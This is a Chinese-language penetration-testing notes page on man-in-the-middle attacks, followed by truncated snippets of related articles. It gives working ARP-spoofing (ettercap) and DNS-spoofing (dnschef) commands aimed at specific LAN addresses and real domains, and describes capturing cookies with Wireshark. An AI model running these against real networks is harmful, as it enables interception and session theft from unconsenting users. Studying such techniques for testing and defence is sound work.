滲透測試筆記 之 中間人攻擊

2021-10-08 18:51:18 字數 1982 閱讀 9378

啟動路由**

sysctl -w net.ipv4.ip_forward=1
arp 欺騙

開啟wireshark 執行並過濾想要抓取的協議

抓取到的cookie:

前提:目標dns伺服器指向你

dnschef --fakeip=180.101.49.11 --fakedomains=www.qq.com,www.sina.com --inte***ce 192.168.2.106 -q

# fakedomains:要欺騙的網域名稱

mac/ipv4/ipv6/pors

00:11:11:11:11:11:11:11/192.168.2.1//

ettercap -tq -m arp:remote -i eth0 /192.168.2.102// /192.168.2.1//
t:文字模式

q:安靜模式

remote:雙向欺騙

需要先將iptables 開啟

vi /etc/ettercap/etter.conf
#---------------

# linux

#---------------

# if you use ipchains:

#redir_command_on = "ipchains -a input -i %iface -p tcp -s %source -d %destination %port -j redirect %rport"

#redir_command_off = "ipchains -d input -i %iface -p tcp -s %source -d %destination %port -j redirect %rport"

# if you use iptables:

redir_command_on = "iptables -t nat -a prerouting -i %iface -p tcp -s %source -d %destination --dport %port -j redirect --to-port %rport"

redir_command_off = "iptables -t nat -d prerouting -i %iface -p tcp -s %source -d %destination --dport %port -j redirect --to-port %rport"

# pendant for ipv6 - note that you need iptables v1.4.16 or newer to use ipv6 redirect

#redir6_command_on = "ip6tables -t nat -a prerouting -i %iface -p tcp -s %source -d %destination --dport %port -j redirect --to-port %rport"

#redir6_command_off = "ip6tables -t nat -d prerouting -i %iface -p tcp -s %source -d %destination --dport %port -j redirect --to-port %rport"

中間人攻擊

正好在公司有機會玩玩內網滲透,於是實踐一下中間人攻擊 我所在的網段為10.0.100.0 24 攻擊者主機ip 10.0.100.133 受害者主機ip 10.0.100.136 閘道器 10.0.100.1 先用nmap掃瞄看看目前內網中在使用的主機ip 使用命令 nmap ss 10.0.100...

中間人攻擊

1.什麼是中間人攻擊 man in the middleattack 簡稱 mitm攻擊 通過各種技術手段將攻擊伺服器放置在兩台正常通訊的計算機之間。2.中間人攻擊的三種方式 1 dns欺騙 修改受害人計算機host,或者dns伺服器,控制路由器等方法,把受害人要訪問的網域名稱對應的ip解析為攻擊者...

中間人攻擊

前面的文章我們講到了rsa演算法以目前的手段是很難被攻破的,那麼使用rsa演算法是不是就一定安全了呢?答案當然是否,因為我們並沒有考慮到網路傳輸中的各種情況。本文會講一種攻擊叫做中間人攻擊,為了抵禦這種攻擊,我們引入證書的概念。我們會在後續的文章中講解證書的概念。這裡我們重點講一下中間人攻擊。所謂中...